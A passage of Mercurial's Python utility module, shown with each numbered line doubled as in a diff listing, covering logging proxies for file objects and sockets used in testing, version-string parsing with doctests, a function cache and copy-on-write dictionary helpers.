572 return object.__getattribute__(self, r'_observedcall')(
572 return object.__getattribute__(self, r'_observedcall')(
573 r'write', *args, **kwargs)
573 r'write', *args, **kwargs)
574
574
575 def detach(self, *args, **kwargs):
575 def detach(self, *args, **kwargs):
576 return object.__getattribute__(self, r'_observedcall')(
576 return object.__getattribute__(self, r'_observedcall')(
577 r'detach', *args, **kwargs)
577 r'detach', *args, **kwargs)
578
578
579 def read1(self, *args, **kwargs):
579 def read1(self, *args, **kwargs):
580 return object.__getattribute__(self, r'_observedcall')(
580 return object.__getattribute__(self, r'_observedcall')(
581 r'read1', *args, **kwargs)
581 r'read1', *args, **kwargs)
582
582
583 class observedbufferedinputpipe(bufferedinputpipe):
583 class observedbufferedinputpipe(bufferedinputpipe):
584 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
584 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
585
585
586 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
586 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
587 bypass ``fileobjectproxy``. Because of this, we need to make
587 bypass ``fileobjectproxy``. Because of this, we need to make
588 ``bufferedinputpipe`` aware of these operations.
588 ``bufferedinputpipe`` aware of these operations.
589
589
590 This variation of ``bufferedinputpipe`` can notify observers about
590 This variation of ``bufferedinputpipe`` can notify observers about
591 ``os.read()`` events. It also re-publishes other events, such as
591 ``os.read()`` events. It also re-publishes other events, such as
592 ``read()`` and ``readline()``.
592 ``read()`` and ``readline()``.
593 """
593 """
594 def _fillbuffer(self):
594 def _fillbuffer(self):
595 res = super(observedbufferedinputpipe, self)._fillbuffer()
595 res = super(observedbufferedinputpipe, self)._fillbuffer()
596
596
597 fn = getattr(self._input._observer, r'osread', None)
597 fn = getattr(self._input._observer, r'osread', None)
598 if fn:
598 if fn:
599 fn(res, _chunksize)
599 fn(res, _chunksize)
600
600
601 return res
601 return res
602
602
603 # We use different observer methods because the operation isn't
603 # We use different observer methods because the operation isn't
604 # performed on the actual file object but on us.
604 # performed on the actual file object but on us.
605 def read(self, size):
605 def read(self, size):
606 res = super(observedbufferedinputpipe, self).read(size)
606 res = super(observedbufferedinputpipe, self).read(size)
607
607
608 fn = getattr(self._input._observer, r'bufferedread', None)
608 fn = getattr(self._input._observer, r'bufferedread', None)
609 if fn:
609 if fn:
610 fn(res, size)
610 fn(res, size)
611
611
612 return res
612 return res
613
613
614 def readline(self, *args, **kwargs):
614 def readline(self, *args, **kwargs):
615 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
615 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
616
616
617 fn = getattr(self._input._observer, r'bufferedreadline', None)
617 fn = getattr(self._input._observer, r'bufferedreadline', None)
618 if fn:
618 if fn:
619 fn(res)
619 fn(res)
620
620
621 return res
621 return res
622
622
623 PROXIED_SOCKET_METHODS = {
623 PROXIED_SOCKET_METHODS = {
624 r'makefile',
624 r'makefile',
625 r'recv',
625 r'recv',
626 r'recvfrom',
626 r'recvfrom',
627 r'recvfrom_into',
627 r'recvfrom_into',
628 r'recv_into',
628 r'recv_into',
629 r'send',
629 r'send',
630 r'sendall',
630 r'sendall',
631 r'sendto',
631 r'sendto',
632 r'setblocking',
632 r'setblocking',
633 r'settimeout',
633 r'settimeout',
634 r'gettimeout',
634 r'gettimeout',
635 r'setsockopt',
635 r'setsockopt',
636 }
636 }
637
637
638 class socketproxy(object):
638 class socketproxy(object):
639 """A proxy around a socket that tells a watcher when events occur.
639 """A proxy around a socket that tells a watcher when events occur.
640
640
641 This is like ``fileobjectproxy`` except for sockets.
641 This is like ``fileobjectproxy`` except for sockets.
642
642
643 This type is intended to only be used for testing purposes. Think hard
643 This type is intended to only be used for testing purposes. Think hard
644 before using it in important code.
644 before using it in important code.
645 """
645 """
646 __slots__ = (
646 __slots__ = (
647 r'_orig',
647 r'_orig',
648 r'_observer',
648 r'_observer',
649 )
649 )
650
650
651 def __init__(self, sock, observer):
651 def __init__(self, sock, observer):
652 object.__setattr__(self, r'_orig', sock)
652 object.__setattr__(self, r'_orig', sock)
653 object.__setattr__(self, r'_observer', observer)
653 object.__setattr__(self, r'_observer', observer)
654
654
655 def __getattribute__(self, name):
655 def __getattribute__(self, name):
656 if name in PROXIED_SOCKET_METHODS:
656 if name in PROXIED_SOCKET_METHODS:
657 return object.__getattribute__(self, name)
657 return object.__getattribute__(self, name)
658
658
659 return getattr(object.__getattribute__(self, r'_orig'), name)
659 return getattr(object.__getattribute__(self, r'_orig'), name)
660
660
661 def __delattr__(self, name):
661 def __delattr__(self, name):
662 return delattr(object.__getattribute__(self, r'_orig'), name)
662 return delattr(object.__getattribute__(self, r'_orig'), name)
663
663
664 def __setattr__(self, name, value):
664 def __setattr__(self, name, value):
665 return setattr(object.__getattribute__(self, r'_orig'), name, value)
665 return setattr(object.__getattribute__(self, r'_orig'), name, value)
666
666
667 def __nonzero__(self):
667 def __nonzero__(self):
668 return bool(object.__getattribute__(self, r'_orig'))
668 return bool(object.__getattribute__(self, r'_orig'))
669
669
670 __bool__ = __nonzero__
670 __bool__ = __nonzero__
671
671
672 def _observedcall(self, name, *args, **kwargs):
672 def _observedcall(self, name, *args, **kwargs):
673 # Call the original object.
673 # Call the original object.
674 orig = object.__getattribute__(self, r'_orig')
674 orig = object.__getattribute__(self, r'_orig')
675 res = getattr(orig, name)(*args, **kwargs)
675 res = getattr(orig, name)(*args, **kwargs)
676
676
677 # Call a method on the observer of the same name with arguments
677 # Call a method on the observer of the same name with arguments
678 # so it can react, log, etc.
678 # so it can react, log, etc.
679 observer = object.__getattribute__(self, r'_observer')
679 observer = object.__getattribute__(self, r'_observer')
680 fn = getattr(observer, name, None)
680 fn = getattr(observer, name, None)
681 if fn:
681 if fn:
682 fn(res, *args, **kwargs)
682 fn(res, *args, **kwargs)
683
683
684 return res
684 return res
685
685
686 def makefile(self, *args, **kwargs):
686 def makefile(self, *args, **kwargs):
687 res = object.__getattribute__(self, r'_observedcall')(
687 res = object.__getattribute__(self, r'_observedcall')(
688 r'makefile', *args, **kwargs)
688 r'makefile', *args, **kwargs)
689
689
690 # The file object may be used for I/O. So we turn it into a
690 # The file object may be used for I/O. So we turn it into a
691 # proxy using our observer.
691 # proxy using our observer.
692 observer = object.__getattribute__(self, r'_observer')
692 observer = object.__getattribute__(self, r'_observer')
693 return makeloggingfileobject(observer.fh, res, observer.name,
693 return makeloggingfileobject(observer.fh, res, observer.name,
694 reads=observer.reads,
694 reads=observer.reads,
695 writes=observer.writes,
695 writes=observer.writes,
696 logdata=observer.logdata,
696 logdata=observer.logdata,
697 logdataapis=observer.logdataapis)
697 logdataapis=observer.logdataapis)
698
698
699 def recv(self, *args, **kwargs):
699 def recv(self, *args, **kwargs):
700 return object.__getattribute__(self, r'_observedcall')(
700 return object.__getattribute__(self, r'_observedcall')(
701 r'recv', *args, **kwargs)
701 r'recv', *args, **kwargs)
702
702
703 def recvfrom(self, *args, **kwargs):
703 def recvfrom(self, *args, **kwargs):
704 return object.__getattribute__(self, r'_observedcall')(
704 return object.__getattribute__(self, r'_observedcall')(
705 r'recvfrom', *args, **kwargs)
705 r'recvfrom', *args, **kwargs)
706
706
707 def recvfrom_into(self, *args, **kwargs):
707 def recvfrom_into(self, *args, **kwargs):
708 return object.__getattribute__(self, r'_observedcall')(
708 return object.__getattribute__(self, r'_observedcall')(
709 r'recvfrom_into', *args, **kwargs)
709 r'recvfrom_into', *args, **kwargs)
710
710
711 def recv_into(self, *args, **kwargs):
711 def recv_into(self, *args, **kwargs):
712 return object.__getattribute__(self, r'_observedcall')(
712 return object.__getattribute__(self, r'_observedcall')(
713 r'recv_info', *args, **kwargs)
713 r'recv_info', *args, **kwargs)
714
714
715 def send(self, *args, **kwargs):
715 def send(self, *args, **kwargs):
716 return object.__getattribute__(self, r'_observedcall')(
716 return object.__getattribute__(self, r'_observedcall')(
717 r'send', *args, **kwargs)
717 r'send', *args, **kwargs)
718
718
719 def sendall(self, *args, **kwargs):
719 def sendall(self, *args, **kwargs):
720 return object.__getattribute__(self, r'_observedcall')(
720 return object.__getattribute__(self, r'_observedcall')(
721 r'sendall', *args, **kwargs)
721 r'sendall', *args, **kwargs)
722
722
723 def sendto(self, *args, **kwargs):
723 def sendto(self, *args, **kwargs):
724 return object.__getattribute__(self, r'_observedcall')(
724 return object.__getattribute__(self, r'_observedcall')(
725 r'sendto', *args, **kwargs)
725 r'sendto', *args, **kwargs)
726
726
727 def setblocking(self, *args, **kwargs):
727 def setblocking(self, *args, **kwargs):
728 return object.__getattribute__(self, r'_observedcall')(
728 return object.__getattribute__(self, r'_observedcall')(
729 r'setblocking', *args, **kwargs)
729 r'setblocking', *args, **kwargs)
730
730
731 def settimeout(self, *args, **kwargs):
731 def settimeout(self, *args, **kwargs):
732 return object.__getattribute__(self, r'_observedcall')(
732 return object.__getattribute__(self, r'_observedcall')(
733 r'settimeout', *args, **kwargs)
733 r'settimeout', *args, **kwargs)
734
734
735 def gettimeout(self, *args, **kwargs):
735 def gettimeout(self, *args, **kwargs):
736 return object.__getattribute__(self, r'_observedcall')(
736 return object.__getattribute__(self, r'_observedcall')(
737 r'gettimeout', *args, **kwargs)
737 r'gettimeout', *args, **kwargs)
738
738
739 def setsockopt(self, *args, **kwargs):
739 def setsockopt(self, *args, **kwargs):
740 return object.__getattribute__(self, r'_observedcall')(
740 return object.__getattribute__(self, r'_observedcall')(
741 r'setsockopt', *args, **kwargs)
741 r'setsockopt', *args, **kwargs)
742
742
743 class baseproxyobserver(object):
743 class baseproxyobserver(object):
744 def _writedata(self, data):
744 def _writedata(self, data):
745 if not self.logdata:
745 if not self.logdata:
746 if self.logdataapis:
746 if self.logdataapis:
747 self.fh.write('\n')
747 self.fh.write('\n')
748 self.fh.flush()
748 self.fh.flush()
749 return
749 return
750
750
751 # Simple case writes all data on a single line.
751 # Simple case writes all data on a single line.
752 if b'\n' not in data:
752 if b'\n' not in data:
753 if self.logdataapis:
753 if self.logdataapis:
754 self.fh.write(': %s\n' % stringutil.escapestr(data))
754 self.fh.write(': %s\n' % stringutil.escapestr(data))
755 else:
755 else:
756 self.fh.write('%s> %s\n'
756 self.fh.write('%s> %s\n'
757 % (self.name, stringutil.escapestr(data)))
757 % (self.name, stringutil.escapestr(data)))
758 self.fh.flush()
758 self.fh.flush()
759 return
759 return
760
760
761 # Data with newlines is written to multiple lines.
761 # Data with newlines is written to multiple lines.
762 if self.logdataapis:
762 if self.logdataapis:
763 self.fh.write(':\n')
763 self.fh.write(':\n')
764
764
765 lines = data.splitlines(True)
765 lines = data.splitlines(True)
766 for line in lines:
766 for line in lines:
767 self.fh.write('%s> %s\n'
767 self.fh.write('%s> %s\n'
768 % (self.name, stringutil.escapestr(line)))
768 % (self.name, stringutil.escapestr(line)))
769 self.fh.flush()
769 self.fh.flush()
770
770
771 class fileobjectobserver(baseproxyobserver):
771 class fileobjectobserver(baseproxyobserver):
772 """Logs file object activity."""
772 """Logs file object activity."""
773 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
773 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
774 logdataapis=True):
774 logdataapis=True):
775 self.fh = fh
775 self.fh = fh
776 self.name = name
776 self.name = name
777 self.logdata = logdata
777 self.logdata = logdata
778 self.logdataapis = logdataapis
778 self.logdataapis = logdataapis
779 self.reads = reads
779 self.reads = reads
780 self.writes = writes
780 self.writes = writes
781
781
782 def read(self, res, size=-1):
782 def read(self, res, size=-1):
783 if not self.reads:
783 if not self.reads:
784 return
784 return
785 # Python 3 can return None from reads at EOF instead of empty strings.
785 # Python 3 can return None from reads at EOF instead of empty strings.
786 if res is None:
786 if res is None:
787 res = ''
787 res = ''
788
788
789 if self.logdataapis:
789 if self.logdataapis:
790 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
790 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
791
791
792 self._writedata(res)
792 self._writedata(res)
793
793
794 def readline(self, res, limit=-1):
794 def readline(self, res, limit=-1):
795 if not self.reads:
795 if not self.reads:
796 return
796 return
797
797
798 if self.logdataapis:
798 if self.logdataapis:
799 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
799 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
800
800
801 self._writedata(res)
801 self._writedata(res)
802
802
803 def readinto(self, res, dest):
803 def readinto(self, res, dest):
804 if not self.reads:
804 if not self.reads:
805 return
805 return
806
806
807 if self.logdataapis:
807 if self.logdataapis:
808 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
808 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
809 res))
809 res))
810
810
811 data = dest[0:res] if res is not None else b''
811 data = dest[0:res] if res is not None else b''
812 self._writedata(data)
812 self._writedata(data)
813
813
814 def write(self, res, data):
814 def write(self, res, data):
815 if not self.writes:
815 if not self.writes:
816 return
816 return
817
817
818 # Python 2 returns None from some write() calls. Python 3 (reasonably)
818 # Python 2 returns None from some write() calls. Python 3 (reasonably)
819 # returns the integer bytes written.
819 # returns the integer bytes written.
820 if res is None and data:
820 if res is None and data:
821 res = len(data)
821 res = len(data)
822
822
823 if self.logdataapis:
823 if self.logdataapis:
824 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
824 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
825
825
826 self._writedata(data)
826 self._writedata(data)
827
827
828 def flush(self, res):
828 def flush(self, res):
829 if not self.writes:
829 if not self.writes:
830 return
830 return
831
831
832 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
832 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
833
833
834 # For observedbufferedinputpipe.
834 # For observedbufferedinputpipe.
835 def bufferedread(self, res, size):
835 def bufferedread(self, res, size):
836 if not self.reads:
836 if not self.reads:
837 return
837 return
838
838
839 if self.logdataapis:
839 if self.logdataapis:
840 self.fh.write('%s> bufferedread(%d) -> %d' % (
840 self.fh.write('%s> bufferedread(%d) -> %d' % (
841 self.name, size, len(res)))
841 self.name, size, len(res)))
842
842
843 self._writedata(res)
843 self._writedata(res)
844
844
845 def bufferedreadline(self, res):
845 def bufferedreadline(self, res):
846 if not self.reads:
846 if not self.reads:
847 return
847 return
848
848
849 if self.logdataapis:
849 if self.logdataapis:
850 self.fh.write('%s> bufferedreadline() -> %d' % (
850 self.fh.write('%s> bufferedreadline() -> %d' % (
851 self.name, len(res)))
851 self.name, len(res)))
852
852
853 self._writedata(res)
853 self._writedata(res)
854
854
855 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
855 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
856 logdata=False, logdataapis=True):
856 logdata=False, logdataapis=True):
857 """Turn a file object into a logging file object."""
857 """Turn a file object into a logging file object."""
858
858
859 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
859 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
860 logdata=logdata, logdataapis=logdataapis)
860 logdata=logdata, logdataapis=logdataapis)
861 return fileobjectproxy(fh, observer)
861 return fileobjectproxy(fh, observer)
862
862
863 class socketobserver(baseproxyobserver):
863 class socketobserver(baseproxyobserver):
864 """Logs socket activity."""
864 """Logs socket activity."""
865 def __init__(self, fh, name, reads=True, writes=True, states=True,
865 def __init__(self, fh, name, reads=True, writes=True, states=True,
866 logdata=False, logdataapis=True):
866 logdata=False, logdataapis=True):
867 self.fh = fh
867 self.fh = fh
868 self.name = name
868 self.name = name
869 self.reads = reads
869 self.reads = reads
870 self.writes = writes
870 self.writes = writes
871 self.states = states
871 self.states = states
872 self.logdata = logdata
872 self.logdata = logdata
873 self.logdataapis = logdataapis
873 self.logdataapis = logdataapis
874
874
875 def makefile(self, res, mode=None, bufsize=None):
875 def makefile(self, res, mode=None, bufsize=None):
876 if not self.states:
876 if not self.states:
877 return
877 return
878
878
879 self.fh.write('%s> makefile(%r, %r)\n' % (
879 self.fh.write('%s> makefile(%r, %r)\n' % (
880 self.name, mode, bufsize))
880 self.name, mode, bufsize))
881
881
882 def recv(self, res, size, flags=0):
882 def recv(self, res, size, flags=0):
883 if not self.reads:
883 if not self.reads:
884 return
884 return
885
885
886 if self.logdataapis:
886 if self.logdataapis:
887 self.fh.write('%s> recv(%d, %d) -> %d' % (
887 self.fh.write('%s> recv(%d, %d) -> %d' % (
888 self.name, size, flags, len(res)))
888 self.name, size, flags, len(res)))
889 self._writedata(res)
889 self._writedata(res)
890
890
891 def recvfrom(self, res, size, flags=0):
891 def recvfrom(self, res, size, flags=0):
892 if not self.reads:
892 if not self.reads:
893 return
893 return
894
894
895 if self.logdataapis:
895 if self.logdataapis:
896 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
896 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
897 self.name, size, flags, len(res[0])))
897 self.name, size, flags, len(res[0])))
898
898
899 self._writedata(res[0])
899 self._writedata(res[0])
900
900
901 def recvfrom_into(self, res, buf, size, flags=0):
901 def recvfrom_into(self, res, buf, size, flags=0):
902 if not self.reads:
902 if not self.reads:
903 return
903 return
904
904
905 if self.logdataapis:
905 if self.logdataapis:
906 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
906 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
907 self.name, size, flags, res[0]))
907 self.name, size, flags, res[0]))
908
908
909 self._writedata(buf[0:res[0]])
909 self._writedata(buf[0:res[0]])
910
910
911 def recv_into(self, res, buf, size=0, flags=0):
911 def recv_into(self, res, buf, size=0, flags=0):
912 if not self.reads:
912 if not self.reads:
913 return
913 return
914
914
915 if self.logdataapis:
915 if self.logdataapis:
916 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
916 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
917 self.name, size, flags, res))
917 self.name, size, flags, res))
918
918
919 self._writedata(buf[0:res])
919 self._writedata(buf[0:res])
920
920
921 def send(self, res, data, flags=0):
921 def send(self, res, data, flags=0):
922 if not self.writes:
922 if not self.writes:
923 return
923 return
924
924
925 self.fh.write('%s> send(%d, %d) -> %d' % (
925 self.fh.write('%s> send(%d, %d) -> %d' % (
926 self.name, len(data), flags, len(res)))
926 self.name, len(data), flags, len(res)))
927 self._writedata(data)
927 self._writedata(data)
928
928
929 def sendall(self, res, data, flags=0):
929 def sendall(self, res, data, flags=0):
930 if not self.writes:
930 if not self.writes:
931 return
931 return
932
932
933 if self.logdataapis:
933 if self.logdataapis:
934 # Returns None on success. So don't bother reporting return value.
934 # Returns None on success. So don't bother reporting return value.
935 self.fh.write('%s> sendall(%d, %d)' % (
935 self.fh.write('%s> sendall(%d, %d)' % (
936 self.name, len(data), flags))
936 self.name, len(data), flags))
937
937
938 self._writedata(data)
938 self._writedata(data)
939
939
940 def sendto(self, res, data, flagsoraddress, address=None):
940 def sendto(self, res, data, flagsoraddress, address=None):
941 if not self.writes:
941 if not self.writes:
942 return
942 return
943
943
944 if address:
944 if address:
945 flags = flagsoraddress
945 flags = flagsoraddress
946 else:
946 else:
947 flags = 0
947 flags = 0
948
948
949 if self.logdataapis:
949 if self.logdataapis:
950 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
950 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
951 self.name, len(data), flags, address, res))
951 self.name, len(data), flags, address, res))
952
952
953 self._writedata(data)
953 self._writedata(data)
954
954
955 def setblocking(self, res, flag):
955 def setblocking(self, res, flag):
956 if not self.states:
956 if not self.states:
957 return
957 return
958
958
959 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
959 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
960
960
961 def settimeout(self, res, value):
961 def settimeout(self, res, value):
962 if not self.states:
962 if not self.states:
963 return
963 return
964
964
965 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
965 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
966
966
967 def gettimeout(self, res):
967 def gettimeout(self, res):
968 if not self.states:
968 if not self.states:
969 return
969 return
970
970
971 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
971 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
972
972
973 def setsockopt(self, level, optname, value):
973 def setsockopt(self, level, optname, value):
974 if not self.states:
974 if not self.states:
975 return
975 return
976
976
977 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
977 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
978 self.name, level, optname, value))
978 self.name, level, optname, value))
979
979
980 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
980 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
981 logdata=False, logdataapis=True):
981 logdata=False, logdataapis=True):
982 """Turn a socket into a logging socket."""
982 """Turn a socket into a logging socket."""
983
983
984 observer = socketobserver(logh, name, reads=reads, writes=writes,
984 observer = socketobserver(logh, name, reads=reads, writes=writes,
985 states=states, logdata=logdata,
985 states=states, logdata=logdata,
986 logdataapis=logdataapis)
986 logdataapis=logdataapis)
987 return socketproxy(fh, observer)
987 return socketproxy(fh, observer)
988
988
989 def version():
989 def version():
990 """Return version information if available."""
990 """Return version information if available."""
991 try:
991 try:
992 from . import __version__
992 from . import __version__
993 return __version__.version
993 return __version__.version
994 except ImportError:
994 except ImportError:
995 return 'unknown'
995 return 'unknown'
996
996
997 def versiontuple(v=None, n=4):
997 def versiontuple(v=None, n=4):
998 """Parses a Mercurial version string into an N-tuple.
998 """Parses a Mercurial version string into an N-tuple.
999
999
1000 The version string to be parsed is specified with the ``v`` argument.
1000 The version string to be parsed is specified with the ``v`` argument.
1001 If it isn't defined, the current Mercurial version string will be parsed.
1001 If it isn't defined, the current Mercurial version string will be parsed.
1002
1002
1003 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1003 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1004 returned values:
1004 returned values:
1005
1005
1006 >>> v = b'3.6.1+190-df9b73d2d444'
1006 >>> v = b'3.6.1+190-df9b73d2d444'
1007 >>> versiontuple(v, 2)
1007 >>> versiontuple(v, 2)
1008 (3, 6)
1008 (3, 6)
1009 >>> versiontuple(v, 3)
1009 >>> versiontuple(v, 3)
1010 (3, 6, 1)
1010 (3, 6, 1)
1011 >>> versiontuple(v, 4)
1011 >>> versiontuple(v, 4)
1012 (3, 6, 1, '190-df9b73d2d444')
1012 (3, 6, 1, '190-df9b73d2d444')
1013
1013
1014 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1014 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1015 (3, 6, 1, '190-df9b73d2d444+20151118')
1015 (3, 6, 1, '190-df9b73d2d444+20151118')
1016
1016
1017 >>> v = b'3.6'
1017 >>> v = b'3.6'
1018 >>> versiontuple(v, 2)
1018 >>> versiontuple(v, 2)
1019 (3, 6)
1019 (3, 6)
1020 >>> versiontuple(v, 3)
1020 >>> versiontuple(v, 3)
1021 (3, 6, None)
1021 (3, 6, None)
1022 >>> versiontuple(v, 4)
1022 >>> versiontuple(v, 4)
1023 (3, 6, None, None)
1023 (3, 6, None, None)
1024
1024
1025 >>> v = b'3.9-rc'
1025 >>> v = b'3.9-rc'
1026 >>> versiontuple(v, 2)
1026 >>> versiontuple(v, 2)
1027 (3, 9)
1027 (3, 9)
1028 >>> versiontuple(v, 3)
1028 >>> versiontuple(v, 3)
1029 (3, 9, None)
1029 (3, 9, None)
1030 >>> versiontuple(v, 4)
1030 >>> versiontuple(v, 4)
1031 (3, 9, None, 'rc')
1031 (3, 9, None, 'rc')
1032
1032
1033 >>> v = b'3.9-rc+2-02a8fea4289b'
1033 >>> v = b'3.9-rc+2-02a8fea4289b'
1034 >>> versiontuple(v, 2)
1034 >>> versiontuple(v, 2)
1035 (3, 9)
1035 (3, 9)
1036 >>> versiontuple(v, 3)
1036 >>> versiontuple(v, 3)
1037 (3, 9, None)
1037 (3, 9, None)
1038 >>> versiontuple(v, 4)
1038 >>> versiontuple(v, 4)
1039 (3, 9, None, 'rc+2-02a8fea4289b')
1039 (3, 9, None, 'rc+2-02a8fea4289b')
1040 """
1040 """
1041 if not v:
1041 if not v:
1042 v = version()
1042 v = version()
1043 parts = remod.split('[\+-]', v, 1)
1043 parts = remod.split('[\+-]', v, 1)
1044 if len(parts) == 1:
1044 if len(parts) == 1:
1045 vparts, extra = parts[0], None
1045 vparts, extra = parts[0], None
1046 else:
1046 else:
1047 vparts, extra = parts
1047 vparts, extra = parts
1048
1048
1049 vints = []
1049 vints = []
1050 for i in vparts.split('.'):
1050 for i in vparts.split('.'):
1051 try:
1051 try:
1052 vints.append(int(i))
1052 vints.append(int(i))
1053 except ValueError:
1053 except ValueError:
1054 break
1054 break
1055 # (3, 6) -> (3, 6, None)
1055 # (3, 6) -> (3, 6, None)
1056 while len(vints) < 3:
1056 while len(vints) < 3:
1057 vints.append(None)
1057 vints.append(None)
1058
1058
1059 if n == 2:
1059 if n == 2:
1060 return (vints[0], vints[1])
1060 return (vints[0], vints[1])
1061 if n == 3:
1061 if n == 3:
1062 return (vints[0], vints[1], vints[2])
1062 return (vints[0], vints[1], vints[2])
1063 if n == 4:
1063 if n == 4:
1064 return (vints[0], vints[1], vints[2], extra)
1064 return (vints[0], vints[1], vints[2], extra)
1065
1065
1066 def cachefunc(func):
1066 def cachefunc(func):
1067 '''cache the result of function calls'''
1067 '''cache the result of function calls'''
1068 # XXX doesn't handle keywords args
1068 # XXX doesn't handle keywords args
1069 if func.__code__.co_argcount == 0:
1069 if func.__code__.co_argcount == 0:
1070 cache = []
1070 cache = []
1071 def f():
1071 def f():
1072 if len(cache) == 0:
1072 if len(cache) == 0:
1073 cache.append(func())
1073 cache.append(func())
1074 return cache[0]
1074 return cache[0]
1075 return f
1075 return f
1076 cache = {}
1076 cache = {}
1077 if func.__code__.co_argcount == 1:
1077 if func.__code__.co_argcount == 1:
1078 # we gain a small amount of time because
1078 # we gain a small amount of time because
1079 # we don't need to pack/unpack the list
1079 # we don't need to pack/unpack the list
1080 def f(arg):
1080 def f(arg):
1081 if arg not in cache:
1081 if arg not in cache:
1082 cache[arg] = func(arg)
1082 cache[arg] = func(arg)
1083 return cache[arg]
1083 return cache[arg]
1084 else:
1084 else:
1085 def f(*args):
1085 def f(*args):
1086 if args not in cache:
1086 if args not in cache:
1087 cache[args] = func(*args)
1087 cache[args] = func(*args)
1088 return cache[args]
1088 return cache[args]
1089
1089
1090 return f
1090 return f
1091
1091
1092 class cow(object):
1092 class cow(object):
1093 """helper class to make copy-on-write easier
1093 """helper class to make copy-on-write easier
1094
1094
1095 Call preparewrite before doing any writes.
1095 Call preparewrite before doing any writes.
1096 """
1096 """
1097
1097
1098 def preparewrite(self):
1098 def preparewrite(self):
1099 """call this before writes, return self or a copied new object"""
1099 """call this before writes, return self or a copied new object"""
1100 if getattr(self, '_copied', 0):
1100 if getattr(self, '_copied', 0):
1101 self._copied -= 1
1101 self._copied -= 1
1102 return self.__class__(self)
1102 return self.__class__(self)
1103 return self
1103 return self
1104
1104
1105 def copy(self):
1105 def copy(self):
1106 """always do a cheap copy"""
1106 """always do a cheap copy"""
1107 self._copied = getattr(self, '_copied', 0) + 1
1107 self._copied = getattr(self, '_copied', 0) + 1
1108 return self
1108 return self
1109
1109
1110 class sortdict(collections.OrderedDict):
1110 class sortdict(collections.OrderedDict):
1111 '''a simple sorted dictionary
1111 '''a simple sorted dictionary
1112
1112
1113 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1113 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1114 >>> d2 = d1.copy()
1114 >>> d2 = d1.copy()
1115 >>> d2
1115 >>> d2
1116 sortdict([('a', 0), ('b', 1)])
1116 sortdict([('a', 0), ('b', 1)])
1117 >>> d2.update([(b'a', 2)])
1117 >>> d2.update([(b'a', 2)])
1118 >>> list(d2.keys()) # should still be in last-set order
1118 >>> list(d2.keys()) # should still be in last-set order
1119 ['b', 'a']
1119 ['b', 'a']
1120 '''
1120 '''
1121
1121
1122 def __setitem__(self, key, value):
1122 def __setitem__(self, key, value):
1123 if key in self:
1123 if key in self:
1124 del self[key]
1124 del self[key]
1125 super(sortdict, self).__setitem__(key, value)
1125 super(sortdict, self).__setitem__(key, value)
1126
1126
1127 if pycompat.ispypy:
1127 if pycompat.ispypy:
1128 # __setitem__() isn't called as of PyPy 5.8.0
1128 # __setitem__() isn't called as of PyPy 5.8.0
1129 def update(self, src):
1129 def update(self, src):
1130 if isinstance(src, dict):
1130 if isinstance(src, dict):
1131 src = src.iteritems()
1131 src = src.iteritems()
1132 for k, v in src:
1132 for k, v in src:
1133 self[k] = v
1133 self[k] = v
1134
1134
1135 class cowdict(cow, dict):
1135 class cowdict(cow, dict):
1136 """copy-on-write dict
1136 """copy-on-write dict
1137
1137
1138 Be sure to call d = d.preparewrite() before writing to d.
1138 Be sure to call d = d.preparewrite() before writing to d.
1139
1139
1140 >>> a = cowdict()
1140 >>> a = cowdict()
1141 >>> a is a.preparewrite()
1141 >>> a is a.preparewrite()
1142 True
1142 True
1143 >>> b = a.copy()
1143 >>> b = a.copy()
1144 >>> b is a
1144 >>> b is a
1145 True
1145 True
1146 >>> c = b.copy()
1146 >>> c = b.copy()
1147 >>> c is a
1147 >>> c is a
1148 True
1148 True
1149 >>> a = a.preparewrite()
1149 >>> a = a.preparewrite()
1150 >>> b is a
1150 >>> b is a
1151 False
1151 False
1152 >>> a is a.preparewrite()
1152 >>> a is a.preparewrite()
1153 True
1153 True
1154 >>> c = c.preparewrite()
1154 >>> c = c.preparewrite()
1155 >>> b is c
1155 >>> b is c
1156 False
1156 False
1157 >>> b is b.preparewrite()
1157 >>> b is b.preparewrite()
1158 True
1158 True
1159 """
1159 """
1160
1160
